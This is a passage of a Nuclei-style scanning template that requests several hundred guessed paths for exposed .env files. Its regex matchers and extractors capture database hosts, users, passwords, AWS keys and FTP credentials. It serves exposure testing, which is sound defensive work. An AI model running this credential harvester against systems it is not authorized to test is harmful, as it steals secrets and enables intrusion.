id: big-env-exp
info:
  name: big .env file accessible
  author: nucleixivanovich
  severity: critical
  description: Laravel uses the .env file.
  reference: https://neal.fun/
  tags: config,exposure,laravel

http:
  - method: GET
    path:
      - '{{BaseURL}}/__tests__/test-become/.env'
      - '{{BaseURL}}/_static/.env'
      - '{{BaseURL}}/.c9/metadata/environment/.env'
      - '{{BaseURL}}/.docker/.env'
      - '{{BaseURL}}/.docker/laravel/app/.env'
      - '{{BaseURL}}/.gitlab-ci/.env'
      - '{{BaseURL}}/.vscode/.env'
      - '{{BaseURL}}/3-sequelize/final/.env'
      - '{{BaseURL}}/07-accessing-data/begin/vue-heroes/.env'
      - '{{BaseURL}}/07-accessing-data/end/vue-heroes/.env'
      - '{{BaseURL}}/08-routing/begin/vue-heroes/.env'
      - '{{BaseURL}}/08-routing/end/vue-heroes/.env'
      - '{{BaseURL}}/09-managing-state/begin/vue-heroes/.env'
      - '{{BaseURL}}/09-managing-state/end/vue-heroes/.env'
      - '{{BaseURL}}/31_structure_tests/.env'
      - '{{BaseURL}}/acme_challenges/.env'
      - '{{BaseURL}}/acme-challenge/.env'
      - '{{BaseURL}}/acme/.env'
      - '{{BaseURL}}/actions-server/.env'
      - '{{BaseURL}}/admin-app/.env'
      - '{{BaseURL}}/admin/.env'
      - '{{BaseURL}}/adminer/.env'
      - '{{BaseURL}}/administrator/.env'
      - '{{BaseURL}}/agora/.env'
      - '{{BaseURL}}/alpha/.env'
      - '{{BaseURL}}/anaconda/.env'
      - '{{BaseURL}}/api/.env'
      - '{{BaseURL}}/api/src/.env'
      - '{{BaseURL}}/app_dir/.env'
      - '{{BaseURL}}/app_nginx_static_path/.env'
      - '{{BaseURL}}/app-order-client/.env'
      - '{{BaseURL}}/app/.env'
      - '{{BaseURL}}/app/client/.env'
      - '{{BaseURL}}/app/code/community/Nosto/Tagging/.env'
      - '{{BaseURL}}/app/config/.env'
      - '{{BaseURL}}/app/config/dev/.env'
      - '{{BaseURL}}/app/frontend/.env'
      - '{{BaseURL}}/app1-static/.env'
      - '{{BaseURL}}/app2-static/.env'
      - '{{BaseURL}}/apps/.env'
      - '{{BaseURL}}/apps/client/.env'
      - '{{BaseURL}}/Archipel/.env'
      - '{{BaseURL}}/asset_img/.env'
      - '{{BaseURL}}/assets/.env'
      - '{{BaseURL}}/Assignment3/.env'
      - '{{BaseURL}}/Assignment4/.env'
      - '{{BaseURL}}/audio/.env'
      - '{{BaseURL}}/awstats/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/as-alias/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/default/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/dev-env/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/empty-values/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/filename/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/override-value/.env'
      - '{{BaseURL}}/babel-plugin-dotenv/test/fixtures/prod-env/.env'
      - '{{BaseURL}}/back-end/app/.env'
      - '{{BaseURL}}/back/.env'
      - '{{BaseURL}}/backend/.env'
      - '{{BaseURL}}/backend/src/.env'
      - '{{BaseURL}}/backendfinaltest/.env'
      - '{{BaseURL}}/backup/.env'
      - '{{BaseURL}}/base_dir/.env'
      - '{{BaseURL}}/basic-network/.env'
      - '{{BaseURL}}/bgoldd/.env'
      - '{{BaseURL}}/bitcoind/.env'
      - '{{BaseURL}}/blankon/.env'
      - '{{BaseURL}}/blob/.env'
      - '{{BaseURL}}/blog/.env'
      - '{{BaseURL}}/blue/.env'
      - '{{BaseURL}}/bookchain-client/.env'
      - '{{BaseURL}}/bootstrap/.env'
      - '{{BaseURL}}/boxes/oracle-vagrant-boxes/ContainerRegistry/.env'
      - '{{BaseURL}}/boxes/oracle-vagrant-boxes/Kubernetes/.env'
      - '{{BaseURL}}/boxes/oracle-vagrant-boxes/OLCNE/.env'
      - '{{BaseURL}}/bucoffea/.env'
      - '{{BaseURL}}/build/.env'
      - '{{BaseURL}}/cardea/backend/.env'
      - '{{BaseURL}}/cdw-backend/.env'
      - '{{BaseURL}}/cgi-bin/.env'
      - '{{BaseURL}}/ch2-mytodo/.env'
      - '{{BaseURL}}/ch6-mytodo/.env'
      - '{{BaseURL}}/ch6a-mytodo/.env'
      - '{{BaseURL}}/ch7-mytodo/.env'
      - '{{BaseURL}}/ch7a-mytodo/.env'
      - '{{BaseURL}}/ch8-mytodo/.env'
      - '{{BaseURL}}/ch8a-mytodo/.env'
      - '{{BaseURL}}/ch8b-mytodo/.env'
      - '{{BaseURL}}/Chai/.env'
      - '{{BaseURL}}/challenge/.env'
      - '{{BaseURL}}/challenges/.env'
      - '{{BaseURL}}/charts/liveObjects/.env'
      - '{{BaseURL}}/chat-client/.env'
      - '{{BaseURL}}/chiminey/.env'
      - '{{BaseURL}}/client-app/.env'
      - '{{BaseURL}}/client/.env'
      - '{{BaseURL}}/client/mutual-fund-app/.env'
      - '{{BaseURL}}/client/src/.env'
      - '{{BaseURL}}/ClientApp/.env'
      - '{{BaseURL}}/clld_dir/.env'
      - '{{BaseURL}}/cmd/testdata/expected/dot_env/.env'
      - '{{BaseURL}}/code/api/.env'
      - '{{BaseURL}}/code/web/.env'
      - '{{BaseURL}}/CodeGolf.Web/ClientApp/.env'
      - '{{BaseURL}}/codenames-frontend/.env'
      - '{{BaseURL}}/collab-connect-web-application/server/.env'
      - '{{BaseURL}}/collected_static/.env'
      - '{{BaseURL}}/community/.env'
      - '{{BaseURL}}/conf/.env'
      - '{{BaseURL}}/config/.env'
      - '{{BaseURL}}/ContainerRegistry/.env'
      - '{{BaseURL}}/content/.env'
      - '{{BaseURL}}/core/.env'
      - '{{BaseURL}}/core/app/.env'
      - '{{BaseURL}}/core/Datavase/.env'
      - '{{BaseURL}}/core/persistence/.env'
      - '{{BaseURL}}/core/src/main/resources/org/jobrunr/dashboard/frontend/.env'
      - '{{BaseURL}}/counterblockd/.env'
      - '{{BaseURL}}/counterwallet/.env'
      - '{{BaseURL}}/cp/.env'
      - '{{BaseURL}}/cron/.env'
      - '{{BaseURL}}/cronlab/.env'
      - '{{BaseURL}}/cryo_project/.env'
      - '{{BaseURL}}/css/.env'
      - '{{BaseURL}}/custom/.env'
      - '{{BaseURL}}/d/.env'
      - '{{BaseURL}}/data/.env'
      - '{{BaseURL}}/database/.env'
      - '{{BaseURL}}/dataset1/.env'
      - '{{BaseURL}}/dataset2/.env'
      - '{{BaseURL}}/default/.env'
      - '{{BaseURL}}/delivery/.env'
      - '{{BaseURL}}/demo-app/.env'
      - '{{BaseURL}}/demo/.env'
      - '{{BaseURL}}/deploy/.env'
      - '{{BaseURL}}/developerslv/.env'
      - '{{BaseURL}}/development/.env'
      - '{{BaseURL}}/directories/.env'
      - '{{BaseURL}}/dist/.env'
      - '{{BaseURL}}/django_project_path/.env'
      - '{{BaseURL}}/django-blog/.env'
      - '{{BaseURL}}/django/.env'
      - '{{BaseURL}}/doc/.env'
      - '{{BaseURL}}/docker-compose/platform/.env'
      - '{{BaseURL}}/docker-elk/.env'
      - '{{BaseURL}}/docker-network-healthcheck/.env'
      - '{{BaseURL}}/docker-node-mongo-redis/.env'
      - '{{BaseURL}}/docker/.env'
      - '{{BaseURL}}/docker/app/.env'
      - '{{BaseURL}}/docker/compose/withMongo/.env'
      - '{{BaseURL}}/docker/compose/withPostgres/.env'
      - '{{BaseURL}}/docker/database/.env'
      - '{{BaseURL}}/docker/db/.env'
      - '{{BaseURL}}/docker/examples/compose/.env'
      - '{{BaseURL}}/docker/postgres/.env'
      - '{{BaseURL}}/docker/webdav/.env'
      - '{{BaseURL}}/docs/.env'
      - '{{BaseURL}}/dodoswap-client/.env'
      - '{{BaseURL}}/dotfiles/.env'
      - '{{BaseURL}}/download/.env'
      - '{{BaseURL}}/downloads/.env'
      - '{{BaseURL}}/e2e/.env'
      - '{{BaseURL}}/en/.env'
      - '{{BaseURL}}/engine/.env'
      - '{{BaseURL}}/env/.env'
      - '{{BaseURL}}/env/dockers/mariadb-test/.env'
      - '{{BaseURL}}/env/dockers/php-apache/.env'
      - '{{BaseURL}}/env/example/.env'
      - '{{BaseURL}}/env/template/.env'
      - '{{BaseURL}}/environments/local/.env'
      - '{{BaseURL}}/environments/production/.env'
      - '{{BaseURL}}/error/.env'
      - '{{BaseURL}}/errors/.env'
      - '{{BaseURL}}/example/.env'
      - '{{BaseURL}}/example02-golang-package/import-underscore/.env'
      - '{{BaseURL}}/example27-how-to-load-env/sample01/.env'
      - '{{BaseURL}}/example27-how-to-load-env/sample02/.env'
      - '{{BaseURL}}/examples/.env'
      - '{{BaseURL}}/examples/01-simple-model/.env'
      - '{{BaseURL}}/examples/02-complex-example/.env'
      - '{{BaseURL}}/examples/03-one-to-many-relationship/.env'
      - '{{BaseURL}}/examples/04-many-to-many-relationship/.env'
      - '{{BaseURL}}/examples/05-migrations/.env'
      - '{{BaseURL}}/examples/06-base-service/.env'
      - '{{BaseURL}}/examples/07-feature-flags/.env'
      - '{{BaseURL}}/examples/08-performance/.env'
      - '{{BaseURL}}/examples/09-production/.env'
      - '{{BaseURL}}/examples/10-subscriptions/.env'
      - '{{BaseURL}}/examples/11-transactions/.env'
      - '{{BaseURL}}/examples/drupal-separate-services/.env'
      - '{{BaseURL}}/examples/react-dashboard/backend/.env'
      - '{{BaseURL}}/examples/sdl-first/.env'
      - '{{BaseURL}}/examples/sdl-first/prisma/.env'
      - '{{BaseURL}}/examples/vue-dashboard/backend/.env'
      - '{{BaseURL}}/examples/web/.env'
      - '{{BaseURL}}/examples/with-cookie-auth-fauna/.env'
      - '{{BaseURL}}/examples/with-dotenv/.env'
      - '{{BaseURL}}/examples/with-firebase-authentication-serverless/.env'
      - '{{BaseURL}}/examples/with-react-relay-network-modern/.env'
      - '{{BaseURL}}/examples/with-relay-modern/.env'
      - '{{BaseURL}}/examples/with-universal-configuration-build-time/.env'
      - '{{BaseURL}}/exapi/.env'
      - '{{BaseURL}}/Exercise.Frontend/.env'
      - '{{BaseURL}}/Exercise.Frontend/train/.env'
      - '{{BaseURL}}/export/.env'
      - '{{BaseURL}}/fastlane/.env'
      - '{{BaseURL}}/favicons/.env'
      - '{{BaseURL}}/favs/.env'
      - '{{BaseURL}}/FE/huey/.env'
      - '{{BaseURL}}/fedex/.env'
      - '{{BaseURL}}/fhir-api/.env'
      - '{{BaseURL}}/files/.env'
      - '{{BaseURL}}/fileserver/.env'
      - '{{BaseURL}}/films/.env'
      - '{{BaseURL}}/Final_Project/Airflow_Dag/.env'
      - '{{BaseURL}}/Final_Project/kafka_twitter/.env'
      - '{{BaseURL}}/Final_Project/StartingFile/.env'
      - '{{BaseURL}}/finalVersion/lcomernbootcamp/projbackend/.env'
      - '{{BaseURL}}/FIRST_CONFIG/.env'
      - '{{BaseURL}}/first-network/.env'
      - '{{BaseURL}}/fisdom/fisdom/.env'
      - '{{BaseURL}}/fixtures/blocks/.env'
      - '{{BaseURL}}/fixtures/fiber-debugger/.env'
      - '{{BaseURL}}/fixtures/flight/.env'
      - '{{BaseURL}}/fixtures/kitchensink/.env'
      - '{{BaseURL}}/flask_test_uploads/.env'
      - '{{BaseURL}}/fm/.env'
      - '{{BaseURL}}/font-icons/.env'
      - '{{BaseURL}}/fonts/.env'
      - '{{BaseURL}}/front-app/.env'
      - '{{BaseURL}}/front-empathy/.env'
      - '{{BaseURL}}/front-end/.env'
      - '{{BaseURL}}/front/.env'
      - '{{BaseURL}}/front/src/.env'
      - '{{BaseURL}}/frontend/.env'
      - '{{BaseURL}}/frontend/momentum-fe/.env'
      - '{{BaseURL}}/frontend/react/.env'
      - '{{BaseURL}}/frontend/vue/.env'
      - '{{BaseURL}}/frontendfinaltest/.env'
      - '{{BaseURL}}/ftp/.env'
      - '{{BaseURL}}/ftpmaster/.env'
      - '{{BaseURL}}/gists/cache'
      - '{{BaseURL}}/gists/laravel'
      - '{{BaseURL}}/gists/pusher'
      - '{{BaseURL}}/github-connect/.env'
      - '{{BaseURL}}/grems-api/.env'
      - '{{BaseURL}}/grems-frontend/.env'
      - '{{BaseURL}}/Hash/.env'
      - '{{BaseURL}}/hasura/.env'
      - '{{BaseURL}}/Helmetjs/.env'
      - '{{BaseURL}}/hgs-static/.env'
      - '{{BaseURL}}/higlass-website/.env'
      - '{{BaseURL}}/home/.env'
      - '{{BaseURL}}/horde/.env'
      - '{{BaseURL}}/hotpot-app-frontend/.env'
      - '{{BaseURL}}/htdocs/.env'
      - '{{BaseURL}}/html/.env'
      - '{{BaseURL}}/http/.env'
      - '{{BaseURL}}/httpboot/.env'
      - '{{BaseURL}}/HUNIV_migration/.env'
      - '{{BaseURL}}/icon/.env'
      - '{{BaseURL}}/icons/.env'
      - '{{BaseURL}}/ikiwiki/.env'
      - '{{BaseURL}}/image_data/.env'
      - '{{BaseURL}}/Imagebord/.env'
      - '{{BaseURL}}/images/.env'
      - '{{BaseURL}}/img/.env'
      - '{{BaseURL}}/install/.env'
      - '{{BaseURL}}/InstantCV/server/.env'
      - '{{BaseURL}}/items/.env'
      - '{{BaseURL}}/javascript/.env'
      - '{{BaseURL}}/js-plugin/.env'
      - '{{BaseURL}}/js/.env'
      - '{{BaseURL}}/jsrelay/.env'
      - '{{BaseURL}}/jupyter/.env'
      - '{{BaseURL}}/khanlinks/.env'
      - '{{BaseURL}}/kibana/.env'
      - '{{BaseURL}}/kodenames-server/.env'
      - '{{BaseURL}}/kolab-syncroton/.env'
      - '{{BaseURL}}/Kubernetes/.env'
      - '{{BaseURL}}/lab/.env'
      - '{{BaseURL}}/laravel/.env'
      - '{{BaseURL}}/latest/.env'
      - '{{BaseURL}}/layout/.env'
      - '{{BaseURL}}/lcomernbootcamp/projbackend/.env'
      - '{{BaseURL}}/leafer-app/.env'
      - '{{BaseURL}}/ledger_sync/.env'
      - '{{BaseURL}}/legacy/tests/9.1.1'
      - '{{BaseURL}}/legacy/tests/9.2.0'
      - '{{BaseURL}}/legal/.env'
      - '{{BaseURL}}/lemonldap-ng-doc/.env'
      - '{{BaseURL}}/lemonldap-ng-fr-doc/.env'
      - '{{BaseURL}}/letsencrypt/.env'
      - '{{BaseURL}}/lib/.env'
      - '{{BaseURL}}/Library/.env'
      - '{{BaseURL}}/libs/.env'
      - '{{BaseURL}}/linux/.env'
      - '{{BaseURL}}/local/.env'
      - '{{BaseURL}}/log/.env'
      - '{{BaseURL}}/logging/.env'
      - '{{BaseURL}}/login/.env'
      - '{{BaseURL}}/mail/.env'
      - '{{BaseURL}}/mailinabox/.env'
      - '{{BaseURL}}/mailman/.env'
      - '{{BaseURL}}/main_user/.env'
      - '{{BaseURL}}/main/.env'
      - '{{BaseURL}}/manual/.env'
      - '{{BaseURL}}/master/.env'
      - '{{BaseURL}}/media/.env'
      - '{{BaseURL}}/memcached/.env'
      - '{{BaseURL}}/mentorg-lava-docker/.env'
      - '{{BaseURL}}/micro-app-react-communication/.env'
      - '{{BaseURL}}/micro-app-react/.env'
      - '{{BaseURL}}/mindsweeper/gui/.env'
      - '{{BaseURL}}/minified/.env'
      - '{{BaseURL}}/misc/.env'
      - '{{BaseURL}}/Modix/ClientApp/.env'
      - '{{BaseURL}}/monerod/.env'
      - '{{BaseURL}}/mongodb/config/dev/.env'
      - '{{BaseURL}}/monitoring/compose/.env'
      - '{{BaseURL}}/moodledata/.env'
      - '{{BaseURL}}/msks/.env'
      - '{{BaseURL}}/munki_repo/.env'
      - '{{BaseURL}}/music/.env'
      - '{{BaseURL}}/MyRentals.Web/ClientApp/.env'
      - '{{BaseURL}}/name/.env'
      - '{{BaseURL}}/new-js/.env'
      - '{{BaseURL}}/news-app/.env'
      - '{{BaseURL}}/nginx-server/.env'
      - '{{BaseURL}}/nginx/.env'
      - '{{BaseURL}}/niffler-frontend/.env'
      - '{{BaseURL}}/node_modules/.env'
      - '{{BaseURL}}/Nodejs-Projects/play-ground/login/.env'
      - '{{BaseURL}}/Nodejs-Projects/play-ground/ManageUserRoles/.env'
      - '{{BaseURL}}/noVNC/.env'
      - '{{BaseURL}}/Nuke.App.Ui/.env'
      - '{{BaseURL}}/oldsanta/.env'
      - '{{BaseURL}}/ops/vagrant/.env'
      - '{{BaseURL}}/option/.env'
      - '{{BaseURL}}/orientdb-client/.env'
      - '{{BaseURL}}/outputs/.env'
      - '{{BaseURL}}/owncloud/.env'
      - '{{BaseURL}}/packages/api/.env'
      - '{{BaseURL}}/packages/app/.env'
      - '{{BaseURL}}/packages/client/.env'
      - '{{BaseURL}}/packages/frontend/.env'
      - '{{BaseURL}}/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env'
      - '{{BaseURL}}/packages/plugin-qiankun/examples/app1/.env'
      - '{{BaseURL}}/packages/plugin-qiankun/examples/app2/.env'
      - '{{BaseURL}}/packages/plugin-qiankun/examples/app3/.env'
      - '{{BaseURL}}/packages/plugin-qiankun/examples/master/.env'
      - '{{BaseURL}}/packages/react-scripts/fixtures/kitchensink/template/.env'
      - '{{BaseURL}}/packages/styled-ui-docs/.env'
      - '{{BaseURL}}/packages/web/.env'
      - '{{BaseURL}}/packed/.env'
      - '{{BaseURL}}/page-editor/.env'
      - '{{BaseURL}}/parity/.env'
      - '{{BaseURL}}/Passportjs/.env'
      - '{{BaseURL}}/patchwork/.env'
      - '{{BaseURL}}/path/.env'
      - '{{BaseURL}}/pfbe/.env'
      - '{{BaseURL}}/pictures/.env'
      - '{{BaseURL}}/playground/.env'
      - '{{BaseURL}}/plugin_static/.env'
      - '{{BaseURL}}/post-deployment/.vscode/.env'
      - '{{BaseURL}}/postfixadmin/.env'
      - '{{BaseURL}}/price_hawk_client/.env'
      - '{{BaseURL}}/prisma/.env'
      - '{{BaseURL}}/private/.env'
      - '{{BaseURL}}/processor/.env'
      - '{{BaseURL}}/prod/.env'
      - '{{BaseURL}}/projbackend/.env'
      - '{{BaseURL}}/project_root/.env'
      - '{{BaseURL}}/psnlink/.env'
      - '{{BaseURL}}/pt2/countries/src/.env'
      - '{{BaseURL}}/pt8/library-backend-gql/.env'
      - '{{BaseURL}}/pub/.env'
      - '{{BaseURL}}/public_html/.env'
      - '{{BaseURL}}/public_root/.env'
      - '{{BaseURL}}/public/.env'
      - '{{BaseURL}}/question2/.env'
      - '{{BaseURL}}/qv-frontend/.env'
      - '{{BaseURL}}/rabbitmq-cluster/.env'
      - '{{BaseURL}}/rails-api/react-app/.env'
      - '{{BaseURL}}/rasax/.env'
      - '{{BaseURL}}/react_todo/.env'
      - '{{BaseURL}}/redmine/.env'
      - '{{BaseURL}}/repo/.env'
      - '{{BaseURL}}/repos/.env'
      - '{{BaseURL}}/repository/.env'
      - '{{BaseURL}}/resources/.env'
      - '{{BaseURL}}/resources/docker/.env'
      - '{{BaseURL}}/resources/docker/mysql/.env'
      - '{{BaseURL}}/resources/docker/phpmyadmin/.env'
      - '{{BaseURL}}/resources/docker/rabbitmq/.env'
      - '{{BaseURL}}/resources/docker/rediscommander/.env'
      - '{{BaseURL}}/resourcesync/.env'
      - '{{BaseURL}}/rest/.env'
      - '{{BaseURL}}/restapi/.env'
      - '{{BaseURL}}/results/.env'
      - '{{BaseURL}}/robots/.env'
      - '{{BaseURL}}/root/.env'
      - '{{BaseURL}}/rosterBack/.env'
      - '{{BaseURL}}/roundcube/.env'
      - '{{BaseURL}}/roundcubemail/.env'
      - '{{BaseURL}}/routes/.env'
      - '{{BaseURL}}/run/.env'
      - '{{BaseURL}}/rust-backend/.env'
      - '{{BaseURL}}/rust-backend/dao/.env'
      - '{{BaseURL}}/s-with-me-front/.env'
      - '{{BaseURL}}/saas/.env'
      - '{{BaseURL}}/samples/chatroom/chatroom-spa/.env'
      - '{{BaseURL}}/samples/docker/deploymentscripts/.env'
      - '{{BaseURL}}/script/.env'
      - '{{BaseURL}}/scripts/.env'
      - '{{BaseURL}}/scripts/fvt/.env'
      - '{{BaseURL}}/selfish-darling-backend/.env'
      - '{{BaseURL}}/Serve_time_server/.env'
      - '{{BaseURL}}/serve-browserbench/.env'
      - '{{BaseURL}}/Server_with_db/.env'
      - '{{BaseURL}}/server/.env'
      - '{{BaseURL}}/server/config/.env'
      - '{{BaseURL}}/server/laravel/.env'
      - '{{BaseURL}}/server/src/persistence/.env'
      - '{{BaseURL}}/services/adminer/.env'
      - '{{BaseURL}}/services/deployment-agent/.env'
      - '{{BaseURL}}/services/documents/.env'
      - '{{BaseURL}}/services/graylog/.env'
      - '{{BaseURL}}/services/jaeger/.env'
      - '{{BaseURL}}/services/minio/.env'
      - '{{BaseURL}}/services/monitoring/.env'
      - '{{BaseURL}}/services/portainer/.env'
      - '{{BaseURL}}/services/redis-commander/.env'
      - '{{BaseURL}}/services/registry/.env'
      - '{{BaseURL}}/services/simcore/.env'
      - '{{BaseURL}}/services/traefik/.env'
      - '{{BaseURL}}/sessions/.env'
      - '{{BaseURL}}/shared/.env'
      - '{{BaseURL}}/shibboleth/.env'
      - '{{BaseURL}}/shop/.env'
      - '{{BaseURL}}/Simple_server/.env'
      - '{{BaseURL}}/site-library/.env'
      - '{{BaseURL}}/site/.env'
      - '{{BaseURL}}/sitemaps/.env'
      - '{{BaseURL}}/sites/.env'
      - '{{BaseURL}}/sitestatic/.env'
      - '{{BaseURL}}/Socketio/.env'
      - '{{BaseURL}}/sources/.env'
      - '{{BaseURL}}/Sources/API/.env'
      - '{{BaseURL}}/spearmint/.env'
      - '{{BaseURL}}/spikes/config-material-app/.env'
      - '{{BaseURL}}/SpotiApps/.env'
      - '{{BaseURL}}/src/__tests__/__fixtures__/instanceWithDependentSteps/.env'
      - '{{BaseURL}}/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env'
      - '{{BaseURL}}/src/__tests__/__fixtures__/typeScriptProject/.env'
      - '{{BaseURL}}/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env'
      - '{{BaseURL}}/src/.env'
      - '{{BaseURL}}/src/add-auth/express/.env'
      - '{{BaseURL}}/src/assembly/.env'
      - '{{BaseURL}}/src/character-service/.env'
      - '{{BaseURL}}/src/client/mobile/.env'
      - '{{BaseURL}}/src/core/tests/dotenv-files/.env'
      - '{{BaseURL}}/src/gameprovider-service/.env'
      - '{{BaseURL}}/src/main/front-end/.env'
      - '{{BaseURL}}/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env'
      - '{{BaseURL}}/src/renderer/.env'
      - '{{BaseURL}}/srv6_controller/controller/.env'
      - '{{BaseURL}}/srv6_controller/examples/.env'
      - '{{BaseURL}}/srv6_controller/node-manager/.env'
      - '{{BaseURL}}/st-js-be-2020-movies-two/.env'
      - '{{BaseURL}}/stackato-pkg/.env'
      - '{{BaseURL}}/static_prod/.env'
      - '{{BaseURL}}/static_root/.env'
      - '{{BaseURL}}/static_user/.env'
      - '{{BaseURL}}/static-collected/.env'
      - '{{BaseURL}}/static-html/.env'
      - '{{BaseURL}}/static-root/.env'
      - '{{BaseURL}}/static/.env'
      - '{{BaseURL}}/staticfiles/.env'
      - '{{BaseURL}}/stats/.env'
      - '{{BaseURL}}/storage/.env'
      - '{{BaseURL}}/style/.env'
      - '{{BaseURL}}/styles/.env'
      - '{{BaseURL}}/stylesheets/.env'
      - '{{BaseURL}}/symfony/.env'
      - '{{BaseURL}}/system-config/.env'
      - '{{BaseURL}}/system/.env'
      - '{{BaseURL}}/target/.env'
      - '{{BaseURL}}/temanr9/.env'
      - '{{BaseURL}}/temanr10/.env'
      - '{{BaseURL}}/temp/.env'
      - '{{BaseURL}}/template/.env'
      - '{{BaseURL}}/templates/.env'
      - '{{BaseURL}}/test-network/.env'
      - '{{BaseURL}}/test-network/addOrg3/.env'
      - '{{BaseURL}}/test/.env'
      - '{{BaseURL}}/test/aries-js-worker/fixtures/.env'
      - '{{BaseURL}}/test/bdd/fixtures/adapter-rest/.env'
      - '{{BaseURL}}/test/bdd/fixtures/agent-rest/.env'
      - '{{BaseURL}}/test/bdd/fixtures/couchdb/.env'
      - '{{BaseURL}}/test/bdd/fixtures/demo/.env'
      - '{{BaseURL}}/test/bdd/fixtures/demo/openapi/.env'
      - '{{BaseURL}}/test/bdd/fixtures/did-method-rest/.env'
      - '{{BaseURL}}/test/bdd/fixtures/did-rest/.env'
      - '{{BaseURL}}/test/bdd/fixtures/edv-rest/.env'
      - '{{BaseURL}}/test/bdd/fixtures/openapi-demo/.env'
      - '{{BaseURL}}/test/bdd/fixtures/sidetree-mock/.env'
      - '{{BaseURL}}/test/bdd/fixtures/universalresolver/.env'
      - '{{BaseURL}}/test/bdd/fixtures/vc-rest/.env'
      - '{{BaseURL}}/test/fixtures/.env'
      - '{{BaseURL}}/test/fixtures/app_types/node/.env'
      - '{{BaseURL}}/test/fixtures/app_types/rails/.env'
      - '{{BaseURL}}/test/fixtures/node_path/.env'
      - '{{BaseURL}}/test/integration/env-config/app/.env'
      - '{{BaseURL}}/testfiles/.env'
      - '{{BaseURL}}/testing/docker/.env'
      - '{{BaseURL}}/tests/.env'
      - '{{BaseURL}}/Tests/Application/.env'
      - '{{BaseURL}}/tests/default_settings/v7.0/.env'
      - '{{BaseURL}}/tests/default_settings/v8.0/.env'
      - '{{BaseURL}}/tests/default_settings/v9.0/.env'
      - '{{BaseURL}}/tests/default_settings/v10.0/.env'
      - '{{BaseURL}}/tests/default_settings/v11.0/.env'
      - '{{BaseURL}}/tests/default_settings/v12.0/.env'
      - '{{BaseURL}}/tests/default_settings/v13.0/.env'
      - '{{BaseURL}}/tests/drupal-test/.env'
      - '{{BaseURL}}/tests/Integration/Environment/.env'
      - '{{BaseURL}}/tests/todo-react/.env'
      - '{{BaseURL}}/testwork_json/.env'
      - '{{BaseURL}}/theme_static/.env'
      - '{{BaseURL}}/theme/.env'
      - '{{BaseURL}}/thumb/.env'
      - '{{BaseURL}}/thumbs/.env'
      - '{{BaseURL}}/tiedostot/.env'
      - '{{BaseURL}}/tmp/.env'
      - '{{BaseURL}}/tools/.env'
      - '{{BaseURL}}/Travel_form/.env'
      - '{{BaseURL}}/ts/prime/.env'
      - '{{BaseURL}}/ubuntu/.env'
      - '{{BaseURL}}/ui/.env'
      - '{{BaseURL}}/unixtime/.env'
      - '{{BaseURL}}/unsplash-downloader/.env'
      - '{{BaseURL}}/upfiles/.env'
      - '{{BaseURL}}/upload/.env'
      - '{{BaseURL}}/uploads/.env'
      - '{{BaseURL}}/urlmem-app/.env'
      - '{{BaseURL}}/User_info/.env'
      - '{{BaseURL}}/v1/.env'
      - '{{BaseURL}}/v2/.env'
      - '{{BaseURL}}/var/backup/.env'
      - '{{BaseURL}}/vendor/.env'
      - '{{BaseURL}}/vendor/github.com/gobuffalo/envy/.env'
      - '{{BaseURL}}/vendor/github.com/subosito/gotenv/.env'
      - '{{BaseURL}}/videos/.env'
      - '{{BaseURL}}/vm-docker-compose/.env'
      - '{{BaseURL}}/vod_installer/.env'
      - '{{BaseURL}}/vue_CRM/.env'
      - '{{BaseURL}}/vue-end/vue-til/.env'
      - '{{BaseURL}}/vue/vuecli/.env'
      - '{{BaseURL}}/web-dist/.env'
      - '{{BaseURL}}/web/.env'
      - '{{BaseURL}}/Web/siteMariage/.env'
      - '{{BaseURL}}/webroot_path/.env'
      - '{{BaseURL}}/websocket/.env'
      - '{{BaseURL}}/webstatic/.env'
      - '{{BaseURL}}/webui/.env'
      - '{{BaseURL}}/well-known/.env'
      - '{{BaseURL}}/whturk/.env'
      - '{{BaseURL}}/windows/tests/9.2.x/.env'
      - '{{BaseURL}}/windows/tests/9.3.x/.env'
      - '{{BaseURL}}/wp-content/.env'
      - '{{BaseURL}}/www-data/.env'
      - '{{BaseURL}}/www/.env'
      - '{{BaseURL}}/xx-final/vue-heroes/.env'
      - '{{BaseURL}}/zmusic-frontend/.env'
      - '{{BaseURL}}/.env'
      - '{{BaseURL}}//.env'
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "(?mi)^\\s*#?^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)="
          - "(?mi)^\\s*#?^DB_(HOST|PASSWORD|DATABASE)="
          - "(?mi)^\\s*#?^(SQS|SNS|SES|BACKUP|AWS)_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)[=:](.*?)"
          - '(?i)(FTP_(USER|PASS))'
          - '(?i)aws_access_key_id\s*=\s*'
        condition: or

    extractors:
      - type: regex
        part: body
        name: db_host
        internal: true
        group: 3
        regex:
          - "(?mi)^\\s*#?(MYSQL|DB|DATABASE)_(HOST|SERVER|HOSTNAME)\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: db_port
        internal: true       
        group: 2
        regex:
          - "(?mi)^\\s*#?(MYSQL|DB|DATABASE)_PORT\\s*[=:]\\s*([^\\s]+)\\s*$"


      - type: regex
        part: body
        name: db_name
        internal: true       
        group: 3
        regex:
          - "(?mi)^\\s*#?(MYSQL|DB)_(DATABASE|NAME)\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: db_user
        internal: true       
        group: 3
        regex:
          - "(?mi)^\\s*#?(MYSQL|DB|DATABASE)_(USER|USERNAME)\\s*[=:]\\s*([^\\s]+)\\s*$"

      - type: regex
        part: body
        name: db_password
        internal: true       
        group: 3
        regex:
          - "(?mi)^\\s*#?(MYSQL|DB|DATABASE)_(PASS|PASSWORD|PASSWD|ROOT_PASSWORD)\\s*[=:]\\s*([^\\s]+)\\s*$"
          

      - type: regex
        part: body
        name: mongo_host
        internal: true
        group: 3
        regex:
          - "(?mi)^\\s*#?(MONGO_DB|MONGO)_(HOST|SERVER|HOSTNAME)\\s*[=:]\\s*([^\\s]+)\\s*$"  

      - type: regex
        part: body
        name: mongo_port
